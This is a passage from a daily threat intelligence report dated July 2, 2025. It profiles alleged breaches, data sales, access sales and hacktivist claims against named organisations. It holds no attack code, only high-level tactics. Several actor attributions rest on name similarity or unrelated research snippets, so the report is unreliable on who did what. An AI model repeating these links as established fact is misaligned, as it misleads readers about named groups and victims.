[July-02-2025] Daily Cybersecurity Threat Report

Posted on

Executive Summary

This daily cybersecurity threat report provides a comprehensive overview of significant incidents observed over the past 24 hours, based on intelligence gathered from open and dark web sources. The period reveals a dynamic threat landscape dominated by financially motivated cybercriminals engaged in extensive data breaches and sales, alongside persistent hacktivist activities. Key observations include a high volume of data leaks impacting various sectors globally, the continued sale of initial access vectors to corporate networks, and the proliferation of sophisticated malware and phishing toolkits. Threat actors leverage diverse tactics, from exploiting vulnerabilities in routers and web applications to employing advanced social engineering and ransomware-as-a-service models. The report details specific incidents, profiles the involved threat actors where information is available, and highlights the broader implications for organizational and individual security.

The analysis of incidents from the past 24 hours underscores several critical trends shaping the current cybersecurity environment:

  • Prevalence of Data Breaches and Leaks: The majority of reported incidents involve data breaches and leaks, indicating a strong focus by threat actors on acquiring and monetizing sensitive information. These range from personal identifiable information (PII) of citizens and consumers to highly confidential corporate and financial documents. The sheer volume of data being exfiltrated and offered for sale suggests a robust underground market for compromised information.
  • Financial Motivation Dominates: A significant proportion of the observed activity is driven by financial gain. Threat actors are actively selling stolen databases, corporate identities, network access, and sophisticated hacking tools. This commercialization of cybercrime resources lowers the barrier for entry, enabling a wider array of malicious actors to conduct attacks.
  • Emergence and Evolution of Threat Actors: While some incidents are attributed to known groups or their affiliates (e.g., Hellcat, LulzSec, Hacktivist of Garuda, Worldleaks), many involve individual or less-documented actors. This highlights the fluid nature of the cybercrime ecosystem, where new entities constantly emerge, often specializing in specific attack vectors or data types. The evolution of ransomware-as-a-service (RaaS) and extortion-as-a-service (EaaS) models further enables these actors by providing ready-made tools and infrastructure.
  • Persistent Hacktivism: Hacktivist groups continue to be active, primarily engaging in website defacements and data breaches. Their motivations often stem from geopolitical conflicts or ideological stances, as evidenced by groups targeting specific countries or industries in retaliation for perceived grievances.
  • Global Reach of Attacks: Incidents span multiple continents, with significant activity observed in the USA, India, Thailand, Germany, Australia, Israel, Tunisia, UK, Peru, Spain, Ukraine, Iran, Romania, Portugal, and Kenya. This global distribution underscores the borderless nature of cyber threats and the need for international collaboration in defense.
  • Diverse Victim Industries: A wide array of industries are being targeted, including Healthcare & Pharmaceuticals, Education, Information Technology (IT) Services, Financial Services, E-commerce, Government Administration, Venture Capital, and Social Media. This broad targeting indicates that threat actors are opportunistic, exploiting vulnerabilities across various sectors to achieve their objectives.
  • Focus on Initial Access Sales: A notable trend is the explicit sale of initial access credentials and privileges (e.g., admin panel access, domain admin, RDP, SSH, VPN access). This commoditization of network entry points facilitates further, more damaging attacks, including ransomware deployment and extensive data exfiltration, by reducing the effort required for follow-on operations.

Incident Analysis

1. Alleged Sale of 0day Vulnerability in Asus RT-AX Routers

  • Incident Overview:
  • Category: Vulnerability
  • Date: 2025-07-02T14:33:44Z
  • Threat Actor: skart7
  • Incident Description: A threat actor, identified as “skart7,” is reportedly offering for sale a zero-day vulnerability impacting Asus RT-AX routers. This vulnerability is described as allowing pre-authentication remote code execution (RCE), meaning it can be exploited without any prior authentication and requires no user interaction. Such a flaw could enable a complete compromise of affected devices, posing a severe risk to home and small office networks utilizing these routers.
  • Threat Actor Profile: skart7 (Scattered Spider)
  • “skart7” is associated with the notorious cybercriminal group Scattered Spider.1 This group has gained significant notoriety for compromising major entertainment and hospitality firms in the United States, including Caesars Entertainment and MGM Resorts International.2 Scattered Spider, also known by aliases such as UNC3944, 0ktapus, Muddled Libra, Scatter Swine, Storm-0875, Octo Tempest, LUCR-3, and Star Fraud, comprises individuals reportedly aged 19 to 22 as of September 2023.2 Some members of this group have recently been arrested in the UK and USA.2
  • Motivations: Scattered Spider’s primary motivation is data theft for extortion.2 They are also known to deploy BlackCat/ALPHV ransomware in conjunction with their data theft activities.2 The sale of a zero-day vulnerability aligns with a financially motivated group seeking to monetize high-value exploits.
  • Key TTPs: Scattered Spider primarily gains initial access through social engineering, frequently employing SMS phishing (smishing) campaigns and phone calls to victim help desks to obtain password reset links or MFA bypass codes.2 They also utilize
    SIM swapping attacks to acquire one-time security codes.2 The group has deployed various
    phishing kits, including EIGHTBAIT.2 For persistence, they use legitimate software like AnyDesk and ScreenConnect, often installing multiple Remote Monitoring and Management (RMM) tools to ensure backdoor access.2 They are proficient at
    defense evasion, disabling antivirus, host-based firewalls, and EDR products, and setting up unmanaged cloud virtual machines.2 They also manipulate Active Directory accounts to bypass SIEM monitoring.2 Their operations involve
    credential access/dumping tools like Mimikatz and Impacket, and they move laterally using RDP and SSH.2 The offering of a zero-day vulnerability indicates a high level of technical sophistication, allowing them to bypass traditional security measures and gain deep initial access. This aligns with their history of exploiting vulnerabilities and maintaining persistent, stealthy access.
  • Source Links:

2. H3C4KEDZ targets the website of Amity Technology And Service

  • Incident Overview:
  • Category: Defacement
  • Date: 2025-07-02T14:32:06Z
  • Victim: Amity Technology And Service Co.,ltd. (Information Technology (IT) Services, Thailand)
  • Threat Actor: H3C4KEDZ
  • Incident Description: The H3C4KEDZ group claims to have defaced the website of Amity Technology And Service Co.,ltd., a Thai IT services company. Website defacement is a common tactic used by hacktivist groups to publicly declare a breach, convey a political or ideological message, or simply demonstrate their capabilities.
  • Threat Actor Profile: H3C4KEDZ (Hellcat Hacking Group)
  • H3C4KEDZ is associated with the Hellcat Hacking Group, which emerged in late 2024, initially known as “ICA Group”.3 This group gained notoriety for high-profile attacks on major corporations such as Schneider Electric, Telefónica, and Orange Romania.3 Hellcat is primarily led by two key threat actors:
    Rey (previously Hikki-Chan, ggyaf, o5tdev) and Pryx (also known as HolyPryx).3
  • Motivations: Hellcat’s motivations appear to be a blend of notoriety, financial gain (from data leaks and selling malware), and hacktivism.3 Rey, identifying as a “Palestinian hacker,” expresses a cynical view of the hacker community and often includes hate speech and toxic rhetoric in online messages.3 Pryx has also made controversial and offensive statements.3 The defacement of an IT services company’s website aligns with Rey’s initial focus on website defacements and the group’s overall aim to publicize their activities and cause disruption.
  • Key TTPs: Rey’s operations frequently involve exploiting Jira credentials to gain access to sensitive data.3 Pryx has claimed to develop a “unique server-side stealer” that uses Tor-based services for data exfiltration.3 Both Rey and Pryx have been involved in high-profile data breaches and data leaks, with Pryx also selling malware like an AES256-based crypter.3 They maintain an aggressive online presence, using platforms like Telegram and X (Twitter) to share leaks and publicize operations.3 Ironically, both Rey and Pryx, despite their use of infostealer logs in their operations, became victims of infostealers themselves (Rey was infected by Redline and Vidar stealers).3
  • Source Links:

3. NXBB.SEC claims to target Cholangiocarcinoma Foundation of Thailand

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T14:22:01Z
  • Victim: Cholangiocarcinoma Foundation of Thailand (Hospital & Health Care, Thailand)
  • Threat Actor: NXBB.SEC
  • Incident Description: The NXBB.SEC group claims to have gained initial access to the Cholangiocarcinoma Foundation of Thailand. Gaining initial access is a critical first step in many cyberattacks, often preceding data exfiltration, system disruption, or the deployment of further malicious payloads. For a healthcare foundation, such access could compromise sensitive patient data or disrupt critical research.
  • Threat Actor Profile: NXBB.SEC (Potential LulzSec Affiliation/Inspired Group)
  • While “NXBB.SEC” is not directly named in the provided information, its naming convention (e.g., .SEC) and the nature of its reported activities (initial access, defacement in other contexts) suggest a possible affiliation with or inspiration from hacktivist groups like LulzSec.4 LulzSec (a contraction for Lulz Security) was a grey hat computer hacking group active in 2011, known for high-profile attacks and affiliations with Anonymous and AntiSec.4
  • History & Profile (LulzSec context): LulzSec emerged from the “Internet Feds” group and was composed of seven core members, led by “Sabu” (Hector Xavier Monsegur).4 They gained attention for their high-profile targets, including the PlayStation Network and the CIA website, and for the sarcastic messages they posted after attacks.5
  • Motivations (LulzSec context): The original LulzSec group primarily hacked “for the lulz” (for fun and to cause mayhem), but they also articulated political messages. These included exposing insecure systems, highlighting the dangers of password reuse, protesting government censorship and monitoring of the internet, and opposing the War on Drugs.5 If NXBB.SEC operates under similar principles, their motivation for targeting a healthcare foundation could be to expose vulnerabilities within the sector, make a public statement, or simply cause disruption.
  • Key TTPs (LulzSec context): Their tactics included Denial of Service (DoS) attacks against websites (e.g., Visa, MasterCard, PayPal), breaking into computer systems, stealing confidential information, publicly disclosing stolen data, hijacking email and Twitter accounts, and defacing websites.4 The “Initial Access” category for this incident directly aligns with LulzSec’s methods of gaining unauthorized entry to systems as a precursor to other activities.
  • Source Links:

4. Alleged data breach of US Medical Labs Inc.

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T14:05:35Z
  • Victim: US Medical Labs Inc. (Healthcare & Pharmaceuticals, USA)
  • Threat Actor: kanie2903
  • Incident Description: The threat actor “kanie2903” claims to have breached the database of US Medical Labs Inc., a healthcare and pharmaceuticals company in the USA. The exfiltrated data reportedly includes sensitive personal information such as names, phone numbers, and email addresses. This type of data is highly valuable on underground markets for purposes like phishing, identity theft, and other forms of fraud.
  • Threat Actor Profile: kanie2903
  • No specific information about “kanie2903” is available in the provided research material. This suggests that “kanie2903” is either a relatively new or less publicly documented individual threat actor, or an alias that has not been explicitly associated with known groups in the provided intelligence.
  • Motivations: Given the nature of the compromised data (PII) and its typical value on dark web markets, the primary motivation behind this breach is highly likely financial gain. The actor likely intends to sell this information to other cybercriminals who can then leverage it for various illicit activities.
  • TTPs: While specific tactics, techniques, and procedures (TTPs) for “kanie2903” are unknown, the successful breach of a database implies the use of common methods such as exploiting web application vulnerabilities (e.g., SQL injection), misconfigured servers, or compromised credentials obtained through phishing or brute-force attacks. The targeting of a healthcare entity suggests a focus on sectors rich in sensitive personal data.
  • Source Links:

5. Alleged data sale of German Citizens

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T13:45:43Z
  • Victim: Residents of Berlin, Germany (General Public)
  • Threat Actor: 570RM
  • Incident Description: A threat actor operating under the alias “570RM” claims to be selling a dataset containing 26,000 lines of information pertaining to residents of Berlin, Germany. The actor states that the data was extracted via brute-force access from an undisclosed service. This incident represents a direct threat to the privacy of German citizens, as their personal information could be used for targeted scams, identity theft, or other malicious purposes.
  • Threat Actor Profile: 570RM
  • No direct information about “570RM” as a specific threat actor is available in the provided research material. The snippets related to this query discuss “DEVMAN,” a ransomware actor, and “SideWinder,” an Indian-affiliated nation-state cyber espionage group.6 These groups are not directly linked to “570RM.” Therefore, “570RM” is likely a new or less publicly documented individual or group, or an alias not explicitly connected in the available intelligence.
  • Motivations: The explicit mention of “sale” of data strongly indicates that the primary motivation behind this leak is financial gain. The actor seeks to profit from the unauthorized acquisition and distribution of personal information.
  • TTPs: The stated method of acquisition, “brute-force access,” points to a common, albeit often unsophisticated, technique for gaining unauthorized entry. This method typically involves systematically trying numerous combinations of usernames and passwords against a target service until a correct one is found. This technique is particularly effective against systems with weak password policies or exposed login portals.
  • Source Links:

6. Alleged database breach of GreenHills Ventures, LLC

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T13:40:57Z
  • Victim: GreenHills Ventures, LLC (Venture Capital, USA)
  • Threat Actor: sentap
  • Incident Description: The threat actor “sentap” claims to be selling the database of GreenHills Ventures, LLC, a U.S.-based venture capital firm. The compromised data is exceptionally sensitive and comprehensive, including legal documents (NDAs, term sheets, shareholder agreements), financial data (statements, cap tables, forecasts), technology information (product profiles, intellectual property documents), business strategies (pitch decks, due diligence materials), and organizational data (charts, compensation reports). The exposure of such critical and proprietary information poses severe risks, including corporate espionage, insider trading, competitive disadvantage, and targeted fraud against the firm or its portfolio companies.
  • Threat Actor Profile: sentap
  • “Sentap” is an active actor on predominantly Russian-speaking dark web forums, such as xss.8
  • Motivations: “Sentap” is primarily financially motivated, focusing on high-effort, high-payoff activities in the cybercrime landscape.8 The sale of highly confidential corporate data from a venture capital firm, which includes strategic and financial intelligence, aligns perfectly with this motivation, as such information can command a high price on underground markets.
  • Key TTPs:
  • Data Acquisition: In a previous incident, “sentap” claimed to have obtained “unprecedented” access to data from the cloud infrastructure of a U.S.-based title company.8 This suggests a proficiency in exploiting cloud security vulnerabilities or compromising cloud-based credentials to gain deep access to organizational data. The current breach of GreenHills Ventures’ database likely involved similar sophisticated access methods.
  • Malicious Activities: Observations indicate “sentap” has been involved in a range of malicious cyber activities, including website cloning, bypassing Web Application Firewalls (WAFs), and crypto draining.8 While the specifics of how these activities are executed are not detailed in the provided information, their involvement points to a diverse toolkit and a high level of technical proficiency in circumventing security measures.
  • Communication: “Sentap” prefers to be contacted via the XMPP messaging protocol Jabber or through direct messages on the forums where they advertise, rather than engaging in public discussions within the threads.8 This preference indicates a desire for discretion and direct negotiation for high-value data.
  • Data Monetization: “Sentap” actively advertises stolen data, emphasizing its value and potential for long-term analysis, particularly if it includes personally identifiable information (PII) such as names, addresses, Social Security numbers, and mortgage details from property-related documents.8 The detailed listing of the types of documents stolen from GreenHills Ventures underscores their understanding of the market value of such comprehensive corporate intelligence.
  • Source Links:

7. Alleged data leak of M.I.S (Marketing Information System)

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T13:37:25Z
  • Victim: M.I.S (Marketing Information System) (Market Research, Israel)
  • Threat Actor: USTINT
  • Incident Description: The USTINT group claims to have leaked a database belonging to M.I.S (Marketing Information System), an Israeli market research firm. The compromised data includes 2,000 names, card data, email addresses, IP addresses, and email screenshots. This combination of personally identifiable information (PII) and financial data is highly valuable for various forms of fraud, including credit card fraud, phishing campaigns, and identity theft.
  • Threat Actor Profile: USTINT
  • No specific information about “USTINT” is available in the provided research material. The snippets for this query refer to “Austin Hackers Anonymous” (AHA!) and “Derp (hacker group),” neither of which is directly linked to “USTINT”.10 This indicates that “USTINT” is likely a new or less publicly documented individual or group, or an alias not explicitly connected in the available intelligence.
  • Motivations: The nature of the leaked data, specifically card data, emails, and IP addresses, strongly suggests that the primary motivation is financial gain. The group likely intends to sell this sensitive information on underground markets to other cybercriminals.
  • TTPs: The successful breach and exfiltration of a database containing such detailed information point to common web application or network exploitation techniques. These could include SQL injection attacks, exploitation of misconfigured databases, or the use of compromised credentials obtained through phishing or brute-force methods. The inclusion of “email screenshots” suggests a deeper level of access or a targeted approach to collecting evidence of compromise.
  • Source Links:

8. Alleged sale of Australia database

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T13:35:19Z
  • Victim: Unspecified Australian entity/citizens (Australia)
  • Threat Actor: w.w.d.o.c.
  • Incident Description: The threat actor “w.w.d.o.c.” claims to be selling a database originating from Australia, containing 24,000 client records. The most alarming aspect of this leak is the inclusion of highly sensitive identity documents such as Driver’s Licenses, Passports, and Medicare numbers. This information represents a severe risk for widespread identity theft, fraudulent document creation, and other sophisticated financial crimes targeting Australian citizens.
  • Threat Actor Profile: w.w.d.o.c.
  • No direct information about “w.w.d.o.c.” is available in the provided research material. The snippets related to this query discuss “GIFTEDCROOK malware” and “Packrat,” which are not directly linked to “w.w.d.o.c.”.12 This indicates that “w.w.d.o.c.” is likely a new or less publicly documented individual or group.
  • Motivations: The explicit “sale” of a database containing highly valuable identity documents clearly indicates that the primary motivation is financial gain. The market for such comprehensive identity data is lucrative, as it enables a wide range of illicit activities.
  • TTPs: While specific TTPs are unknown, the acquisition of such sensitive and official identity documents often requires sophisticated methods. These could include successful phishing campaigns targeting individuals or organizations holding such data, deployment of advanced information-stealing malware, or direct breaches of government or institutional databases that store these records. The scale of 24,000 records suggests either a significant compromise of a single entity or an aggregation of data from multiple smaller breaches.
  • Source Links:

9. LulzSec Black claims to target Liechtenstein

  • Incident Overview:
  • Category: Alert
  • Date: 2025-07-02T13:26:04Z
  • Victim: Digital infrastructure of Liechtenstein (Information Technology (IT) Services, Liechtenstein)
  • Threat Actor: LulzSec Black
  • Incident Description: The group “LulzSec Black” has issued a public alert, declaring their intention to target the digital infrastructure of Liechtenstein. This type of public declaration is characteristic of hacktivist groups, often serving as a warning or a statement of intent that precedes disruptive cyberattacks such as Distributed Denial of Service (DDoS) campaigns, website defacements, or data breaches.
  • Threat Actor Profile: LulzSec Black (LulzSec Offshoot)
  • “LulzSec Black” is highly likely an offshoot or a group adopting the moniker and ideology of the original LulzSec group.4 The original LulzSec (a contraction for Lulz Security) was a grey hat computer hacking group active in May-June 2011, known for its high-profile attacks and affiliations with Anonymous and AntiSec.4
  • History & Profile (LulzSec context): The original LulzSec gained notoriety for compromising user accounts from PlayStation Network in 2011 and for taking the CIA website offline.5 They were distinctive for their sarcastic messages posted in the aftermath of their attacks.5 LulzSec consisted of seven core members and was led by “Sabu” (Hector Xavier Monsegur).4
  • Motivations: The original LulzSec group’s primary motivation was to “have fun by causing mayhem” (“for the lulz”), but they also claimed political motivations.5 These included drawing attention to insecure systems, highlighting the dangers of password reuse, and expressing opposition to government censorship and monitoring of the internet, as well as the War on Drugs.5 LulzSec Black’s public declaration against Liechtenstein’s digital infrastructure suggests a similar hacktivist motivation, possibly aiming for disruption, a political statement, or to expose perceived vulnerabilities, rather than direct financial gain.
  • Key TTPs (LulzSec context): The tactics employed by the original LulzSec group included Denial of Service (DoS) attacks against websites (e.g., Visa, MasterCard, PayPal), breaking into computer systems, stealing confidential information, publicly disclosing stolen data, hijacking victims’ email and Twitter accounts, and defacing websites.4 The “Alert” category for this incident suggests a pre-cursor to such disruptive actions, consistent with the historical operations of LulzSec and its affiliates.
  • Source Links:

10. Alleged data sale of Whatsapp users

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T13:13:45Z
  • Victim: WhatsApp Inc. (Social Media & Online Social Networking, USA)
  • Threat Actor: Machine1337
  • Incident Description: The threat actor “Machine1337” claims to be selling a massive dataset containing information on 520 million WhatsApp users, along with 60,000 sample records to prove authenticity. This represents an extremely large-scale data leak with profound privacy implications for a global user base, potentially exposing personal details to a wide array of malicious actors for targeted scams, identity theft, or social engineering campaigns.
  • Threat Actor Profile: Machine1337 (EnergyWeaponsUser)
  • “Machine1337” is also known by the alias “EnergyWeaponsUser”.14
  • History & Profile: This actor has a history of involvement in large-scale data theft, having been linked to the compromise and theft of more than 89 million user records, which included one-time access codes, in previous incidents.14 While the provided snippets also mention “Dragonfly” 37, the direct link to “EnergyWeaponsUser” and large-scale user record theft is more relevant to “Machine1337” and this incident.
  • Motivations: The explicit “sale” of a massive user database clearly indicates that the primary motivation is financial gain. The inclusion of “one-time access codes” in past incidents suggests a focus on acquiring credentials and sensitive authentication data for potential account takeover, which can be further monetized through various illicit means. The scale of the alleged WhatsApp leak aligns with an actor focused on high-volume data monetization.
  • Key TTPs: Their past activities, specifically the theft of user records and one-time access codes, imply a proficiency in exploiting vulnerabilities that grant access to large user databases. These could include web application flaws, API vulnerabilities, or large-scale credential stuffing attacks. The success in allegedly compromising such a widely used platform like WhatsApp suggests a sophisticated or highly successful attack vector, potentially involving zero-day exploits or a significant breach of internal systems.
  • Source Links:

11. Alleged leak of unauthorized admin access to OwlCom

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T13:08:45Z
  • Victim: OwlCom (Graphic & Web Design, Tunisia)
  • Threat Actor: mecrobyte
  • Incident Description: The threat actor “mecrobyte” claims to have obtained full admin panel access to OwlCom, a graphic and web design company in Tunisia. This level of compromise includes control over settings, user management, and internal resources. Such extensive access poses significant risks, including service disruption, widespread data exposure, website defacement, and the potential for further lateral movement within the organization’s network or its clients’ systems.
  • Threat Actor Profile: mecrobyte
  • No specific information about “mecrobyte” is available in the provided research material. This suggests that “mecrobyte” is either a new or less publicly documented individual threat actor, or an alias that has not been explicitly associated with known groups in the provided intelligence.
  • Motivations: The primary motivation is highly likely financial gain, as “mecrobyte” is also observed in another incident selling root access to the Tunisian Post Office server. This pattern indicates a focus on acquiring and monetizing high-privilege access to various organizations.
  • TTPs: Gaining full admin panel access typically involves exploiting common web application vulnerabilities (e.g., weak authentication, insecure direct object references, or known CMS vulnerabilities), brute-forcing credentials, or compromising legitimate credentials through phishing or malware. The ability to control “internal resources” suggests a broader compromise beyond just the public-facing website.
  • Source Links:

12. Alleged Sale of Domain Admin Access to UK-Based Global Provider Company

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T12:53:02Z
  • Victim: Unidentified UK-based global provider company (UK)
  • Threat Actor: shiitbaby
  • Incident Description: The threat actor “shiitbaby” claims to be selling unauthorized access to a UK-based global provider company, specifically advertising domain admin privileges. This level of access is among the most critical an attacker can obtain, granting full control over the organization’s entire IT infrastructure, including user accounts, servers, and data. Such access is highly valuable for deploying ransomware, conducting extensive data theft, establishing long-term persistence, or facilitating supply chain attacks.
  • Threat Actor Profile: shiitbaby
  • No specific information about “shiitbaby” is available in the provided research material. This suggests that “shiitbaby” is either a new or less publicly documented individual threat actor, or an alias not explicitly associated with known groups in the provided intelligence.
  • Motivations: The explicit “sale” of domain admin access clearly indicates that the primary motivation is financial gain. Access of this caliber commands a very high price on underground forums due to the immense control it provides.
  • TTPs: Obtaining domain admin privileges typically requires sophisticated exploitation of network vulnerabilities, weaknesses in Active Directory configurations, or highly effective social engineering campaigns that lead to the compromise of privileged credentials. It often involves a multi-stage attack, starting with initial access and then escalating privileges to achieve full domain control.
  • Source Links:

13. Alleged leak of 100K cracking Marketplace database

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T12:47:00Z
  • Victim: Cracking darknet marketplace (Unspecified)
  • Threat Actor: DigitalGhost
  • Incident Description: The threat actor “DigitalGhost” claims to have leaked a database containing information on 100,000 users from the “Cracking” darknet marketplace. This incident highlights the inherent risks within the cybercrime ecosystem itself, demonstrating that even illicit platforms are vulnerable to breaches. The compromised data, likely including usernames, hashed passwords, and potentially other PII, could be used for credential stuffing attacks against other services where users might reuse passwords, or to identify individuals involved in illicit activities.
  • Threat Actor Profile: DigitalGhost (Ghost Ransomware Actor)
  • “DigitalGhost” is associated with the Ghost ransomware actor, also known by numerous aliases including Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.15 It is important to note that a separate snippet 38 refers to “GE Digital Ghost” which is a defensive product and not related to this threat actor.
  • History & Profile: The Ghost ransomware actor has been active since early 2021, primarily targeting internet-facing services that run outdated versions of software and firmware.15 This group is based in China and conducts widespread attacks across more than 70 countries, compromising a diverse range of victims including critical infrastructure, schools, healthcare organizations, government networks, religious institutions, and small-to-medium businesses.15
  • Motivations: The primary motivation of the Ghost ransomware actor is financial gain.15 While this specific incident is a data leak from a darknet market rather than a direct ransomware attack on a traditional victim, it could serve several purposes for a financially motivated group: demonstrating capability to attract affiliates, disrupting competitors in the cybercrime space, or acquiring credentials that can be leveraged for further attacks against other targets.
  • Key TTPs:
  • Initial Access: Ghost actors commonly obtain initial access by exploiting publicly available Common Vulnerabilities and Exposures (CVEs) in internet-facing applications. These have included vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), servers running Adobe ColdFusion (CVE-2010-2861 and CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207).15
  • Execution & Persistence: They have been observed uploading web shells to compromised servers and leveraging Windows Command Prompt and PowerShell to download and execute Cobalt Strike Beacon malware, which is then implanted on victim systems.15 They also sporadically create new local and domain accounts or change passwords for existing accounts to maintain persistence.15
  • Privilege Escalation: Ghost actors often utilize built-in Cobalt Strike functions to steal process tokens running under the SYSTEM user context, allowing them to impersonate the SYSTEM user and rerun Beacon with elevated privileges.15
  • Ransomware Operations: They are known for rotating their ransomware executable payloads, switching file extensions for encrypted files, and modifying ransom note text, which complicates attribution.15 They often proceed from initial compromise to the deployment of ransomware within the same day, indicating a highly efficient operational tempo.15
  • Command and Control (C2): For communication with victims, Ghost actors use legitimate email services that include traffic encryption features, such as Tutanota, Skiff, and ProtonMail.15
  • Source Links:

14. Alleged Sale of Germany GmbH Corporate Identity data

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T12:45:12Z
  • Victim: Germany GmbH Corporate Identity (Germany)
  • Threat Actor: jojocarabinieri
  • Incident Description: The threat actor “jojocarabinieri” claims to be selling a complete corporate identity package for a Germany GmbH (limited liability company). This highly sensitive data includes notarized documents such as company registration, articles of association, shareholder details, and bank statements. Furthermore, the listing features “CEO fullz,” which includes the CEO’s ID (front and back) and a selfie holding the ID. This type of leak is critically valuable for sophisticated corporate fraud, business email compromise (BEC) schemes, impersonation, and other financial crimes, potentially enabling attackers to take over corporate accounts or establish fraudulent entities.
  • Threat Actor Profile: jojocarabinieri
  • No specific information about “jojocarabinieri” is available in the provided research material. This suggests that “jojocarabinieri” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of such high-value corporate and personal identity data clearly indicates that the primary motivation is financial gain. The comprehensive nature of the leaked information suggests it would command a premium price on underground markets due to its utility in various high-impact financial frauds.
  • TTPs: Acquiring such a comprehensive and verified corporate identity package, especially including notarized documents and CEO “fullz,” likely requires a deep and persistent breach of a corporate network, a legal firm, an accounting firm, or a government registry. It could involve highly targeted social engineering, insider threat collaboration, or the exploitation of critical vulnerabilities in systems handling sensitive corporate records.
  • Source Links:

15. Alleged sale of Market data

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T12:00:22Z
  • Victim: Multiple top global cryptocurrency exchanges (Binance, Coinbase, Kraken, Bitfinex, etc.)
  • Threat Actor: Khprince
  • Incident Description: The threat actor “Khprince” claims to have leaked a large dataset containing aggregated market data from multiple top global cryptocurrency exchanges, including major players like Binance, Coinbase, Kraken, and Bitfinex. While aggregated market data might seem less sensitive than personally identifiable information (PII), it can be highly valuable for illicit trading strategies, market manipulation, front-running, or identifying patterns that could lead to further exploitation of these platforms or their users.
  • Threat Actor Profile: Khprince
  • No specific information about “Khprince” is available in the provided research material. This suggests that “Khprince” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of this data indicates that the primary motivation is financial gain. This gain could come directly from the sale of the dataset or indirectly by leveraging the data for illicit trading activities or arbitrage opportunities in the cryptocurrency markets.
  • TTPs: Acquiring aggregated market data from multiple, distinct cryptocurrency exchanges suggests either a sophisticated attack on a common data aggregator service that collects information from these exchanges, or a series of individual compromises of various exchanges followed by the aggregation of the exfiltrated data. This would require significant technical capability to bypass the security measures of multiple high-profile financial platforms.
  • Source Links:

16. Alleged Sale of Compromised Crypto Meme Twitter API

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T11:54:51Z
  • Victim: Crypto meme page Twitter account (Social Media)
  • Threat Actor: MrDark
  • Incident Description: The threat actor “MrDark” claims to be selling access to the API of a compromised Twitter account belonging to a crypto meme page with over 17.3K followers. The API access reportedly includes elevated permissions such as post.read, users.read, and bookmark.write. The sale purportedly includes not only the access but also the underlying vulnerability that enabled the breach. This type of access could be highly valuable for conducting cryptocurrency scams, spreading disinformation, launching sophisticated social engineering campaigns, or promoting fraudulent schemes to a large, engaged audience.
  • Threat Actor Profile: MrDark
  • No specific information about “MrDark” is available in the provided research material. This suggests that “MrDark” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of the compromised API access and the underlying vulnerability clearly indicates that the primary motivation is financial gain. The targeting of a crypto-related account suggests a specific interest in leveraging the compromised access for cryptocurrency fraud, market manipulation, or other financially motivated illicit activities within the crypto space.
  • TTPs: The sale of “the underlying vulnerability” implies that the actor has either discovered a new zero-day exploit or acquired an N-day exploit for Twitter’s API or related services. This indicates a higher level of technical capability than typical credential stuffing attacks. Exploiting API vulnerabilities can provide direct, programmatic control over platform functionalities, enabling large-scale automated malicious actions without requiring direct user interaction.
  • Source Links:

17. Alleged Sale of Spoofed Zoom Meeting Toolkit

  • Incident Overview:
  • Category: Malware
  • Date: 2025-07-02T11:42:37Z
  • Victim: General users/organizations vulnerable to social engineering via spoofed meetings
  • Threat Actor: Darky1337
  • Incident Description: The threat actor “Darky1337” claims to be selling a spoofed Zoom meeting toolkit designed to simulate realistic Zoom sessions. The tool offers features such as the ability to create meetings with 1 to 5 simulated participants, customize avatars and pre-recorded videos, and replicate Zoom’s official grid layout. It also supports adding custom functions upon request and includes an admin dashboard and a Zoom-like application interface, demonstrated through screenshots. This toolkit is a highly sophisticated social engineering tool, designed to create extremely convincing phishing lures, likely for credential theft, malware delivery, or business email compromise (BEC) scams.
  • Threat Actor Profile: Darky1337
  • No specific information about “Darky1337” is available in the provided research material. This suggests that “Darky1337” is either a new or less publicly documented individual threat actor specializing in the development and sale of social engineering tools.
  • Motivations: The primary motivation is financial gain through the sale of this advanced toolkit. By providing such a realistic and customizable tool, “Darky1337” enables other cybercriminals to conduct more effective and deceptive social engineering campaigns, thereby profiting from the broader cybercrime ecosystem.
  • TTPs: This actor specializes in developing sophisticated social engineering tools that leverage popular communication platforms like Zoom. The features described (simulated participants, custom avatars, pre-recorded videos, realistic layout, custom functions) indicate a deep understanding of user behavior and platform mechanics, designed to bypass human skepticism and traditional security awareness training. This tool significantly enhances the realism and effectiveness of phishing campaigns, making it harder for victims to detect and mitigate.
  • Source Links:

18. Alleged data breach of Nirmal Haloi College

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T11:32:15Z
  • Victim: Nirmal Haloi College (Education, India)
  • Threat Actor: GARUDA ERROR SYSTEM
  • Incident Description: The “GARUDA ERROR SYSTEM” group claims to have leaked the database of Nirmal Haloi College, an educational institution in India. The compromised data includes academic records such as attendance logs, subject lists, and verification files, provided in CSV format. The exposure of academic records can lead to identity theft, academic fraud, or serve as a basis for highly targeted phishing attacks against students and faculty.
  • Threat Actor Profile: GARUDA ERROR SYSTEM (Likely Hacktivist of Garuda)
  • “GARUDA ERROR SYSTEM” is highly likely an alias or closely affiliated with the Indonesian hacktivist group “Hacktivist of Garuda”.17
  • History & Profile: “Hacktivist of Garuda” is an Indonesian hacktivist group that established a Telegram channel specifically to announce cyberattacks targeting Indian entities.17 They have explicitly stated that their attacks are a
    counterattack in retaliation for perceived attacks by Indian hackers (e.g., “Indian Cyber Mafia”) on Indian private sites.17 The group previously claimed to have stolen data from Indian railways.17
